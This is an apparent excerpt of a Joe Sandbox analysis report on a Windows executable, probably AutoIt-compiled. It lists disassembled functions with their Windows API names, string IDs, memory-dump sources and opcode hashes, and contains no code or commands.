                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2573188126-1403004172
                                                            • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                            • Instruction ID: 6644a5a3c2478a35ebbfa4e8f37b27ebe2e44690b266fa494b3a595b000c676d
                                                            • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                            • Instruction Fuzzy Hash: B131B8B9A08A4181FA14BF15F8543A8E761FF89BE0F844232DAAD077D6CE3CD505C761
                                                            Function 00007FF7EC19CA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 2479661705-3771769585
                                                            • Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                            • Instruction ID: e3b58bff011c5ccafdd878545f70ec776ce03733a7d9df291efc5f1b2ded08de
                                                            • Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                            • Instruction Fuzzy Hash: A6214FA5B0858281EA20FB15F5543BDA321BF95BC5FC44133D58E476A9EE3CE544C322
                                                            Function 00007FF7EC1D0D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                            • String ID:
                                                            • API String ID: 2672075419-0
                                                            • Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                            • Instruction ID: 318a80cdde7d049ccebc0a98323bab087dff873cebfe1096c5e0b40cfca43c81
                                                            • Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                            • Instruction Fuzzy Hash: 2091A3BAB086528AEB50EF61E4403BDA7A1FB44B99FA04037DD1D4778DDE38E405C322
                                                            Function 00007FF7EC18E908 Relevance: 15.1, APIs: 10, Instructions: 59keyboardsleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 685491774-0
                                                            • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                            • Instruction ID: 14b6b2748cf2de98698df74ef54acd6c86d73fccfb805468ad61257e113d352f
                                                            • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                            • Instruction Fuzzy Hash: 8B11A8F9B0890282F7046F66F4547AD6B51AFCCB81F80503AC95E4B754DD3DD154C362
                                                            Function 00007FF7EC1B767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Variant$Init$Clear
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                            • API String ID: 3467423407-1765764032
                                                            • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                            • Instruction ID: d9fefd04702457fa4cedf052ea2e16d1149214fc2669b48c7854418f58822818
                                                            • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                            • Instruction Fuzzy Hash: 14A1A0BAA08B42C6EB10AF65E4407ADB7A0FB84B98F940136DE4D07754DF3CD445CB61
                                                            Function 00007FF7EC1CA350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                            • String ID: -----$SysListView32
                                                            • API String ID: 2361508679-3975388722
                                                            • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                            • Instruction ID: 7c71e29fb73e4d8f0980d4261238bf33a748ef1fdf525924494c1113844d155f
                                                            • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                            • Instruction Fuzzy Hash: A851D07AA04B818AE720DF65E8447DDB7A5FB88784F80413AEE4C47B59CF38D994CB50
                                                            Function 00007FF7EC18E2CC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 54windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 2019164449-3381328864
                                                            • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                            • Instruction ID: 0bef07a122e261a6782a81901cce20f4a506e9dc7cc6a9129027dbc7e1909cf2
                                                            • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                            • Instruction Fuzzy Hash: 5B212FAAB1CA4390FA60BB11FA54779E350AF817C4F808037CE4D4B655EE3CE516D722
                                                            Function 00007FF7EC1B7054 Relevance: 13.9, APIs: 9, Instructions: 373COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                            • String ID:
                                                            • API String ID: 1903627254-0
                                                            • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                            • Instruction ID: 8022c7e5fd2543fe72b19211c93460756ba10e97cf36fe13479f4610b2180d92
                                                            • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                            • Instruction Fuzzy Hash: A20251AAA08B82C6DB50EF29E4442ADA770FB84B84F915032DF4E47B64DF3CD545CB61
                                                            Function 00007FF7EC1CC324 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                            • String ID:
                                                            • API String ID: 3210457359-0
                                                            • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                            • Instruction ID: e882d6b6d360eaff289b241404527aba478e7dfb90eb2c566ed97b8a96eac604
                                                            • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                            • Instruction Fuzzy Hash: 0661B3ADB1854386F738BA25F860BB99651BF807A4F988133E91D436D5CE7DE840D323
                                                            Function 00007FF7EC1D0B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 3721556410-2107944366
                                                            • Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                            • Instruction ID: fc76b49f881256a5e685f658373b4a1ab5e8298d587c4ec27f6216996754c18b
                                                            • Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                            • Instruction Fuzzy Hash: 796180BAA14A52C5EB00EF61E8806ED7B74FB44B98F901137ED1D17BA9CE38D445C361
                                                            Function 00007FF7EC1BE580 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                            • Instruction ID: db65a855bc085818a77237b8c8437438655bd174322693d827b86f0d614e2e72
                                                            • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                            • Instruction Fuzzy Hash: 795176AAA08642C6EB14FB15E19037CBB60FF84B95F858432D60D07796DF7CE505CB25
                                                            Function 00007FF7EC19A070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 2$P
                                                            • API String ID: 93392585-1110268094
                                                            • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                            • Instruction ID: dea8583d2d4dda5f38f3dc66f98795d24c64101e679daf3556d8709e7f016191
                                                            • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                            • Instruction Fuzzy Hash: 2F51E3B6A0864289F710EF69F4403BDB7B6BB01758FA44176CA5D02694CF38E499C722
                                                            Function 00007FF7EC1CE248 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$LongMessageSend$Show
                                                            • String ID: '
                                                            • API String ID: 257662517-1997036262
                                                            • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                            • Instruction ID: a34ec60556a4922befdd0a564a512556ef6d3adf1e34f296dd7e5ab9ce7544cb
                                                            • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                            • Instruction Fuzzy Hash: 5951E9BAA0C65285E768AB65B454F7DAB50FF81B90F949133DE6E03790CE3DE442C321
                                                            Function 00007FF7EC19AD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: IconLoad_invalid_parameter_noinfo
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 4060274358-404129466
                                                            • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                            • Instruction ID: 6eeb53206eed3ad4dc3846b848c8e26435c99b715149ddc29cb4774d88d06efc
                                                            • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                            • Instruction Fuzzy Hash: 19214DA9B0C78381FA54BF1AB9007B9F796AF44780FC45072DE4D46395EE7CE426D222
                                                            Function 00007FF7EC19C5C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Messagewprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 4051287042-3128320259
                                                            • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                            • Instruction ID: ea29f83b7e46ffd0a43de10da180df2ee103d450ffe1ad99bb4b2fecc87e828c
                                                            • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                            • Instruction Fuzzy Hash: BC1182B9718B8591D720AB10F4407EAA764FB88746FC04037DA8E43748CE3CC145C761
                                                            Function 00007FF7EC1D233C Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                            • Instruction ID: a20c1fb2de6e0b88bc1e535c7706b3b6af3dcd03fd8ae6bca816a8515b63796a
                                                            • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                            • Instruction Fuzzy Hash: 76A14ABA71868382E768AF25E144B79BBA0FB44B46F515036DE1943B98CF3CEC51C712
                                                            Function 00007FF7EC1BFCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 50796853-0
                                                            • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                            • Instruction ID: 9f2d42c59579bb9ef3b53a52a05fb73079a6593020b8e2fd9ddb471027ecdebe
                                                            • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                            • Instruction Fuzzy Hash: D9B181BAB08642C6EB14EF65E0903BCA760FF85B84F818432EA4E57696CF3CD105C765
                                                            Function 00007FF7EC14443C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                            • Instruction ID: 358111cb7ccc446181ecf5ae48c9c92bafa941f63355ab093b143960c5b2f99a
                                                            • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                            • Instruction Fuzzy Hash: F05197AEE0C14289FB65BB29B44437D9696AF41B04FAC4033C90D0E6D9DE3DA484D273
                                                            Function 00007FF7EC1C90A8 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
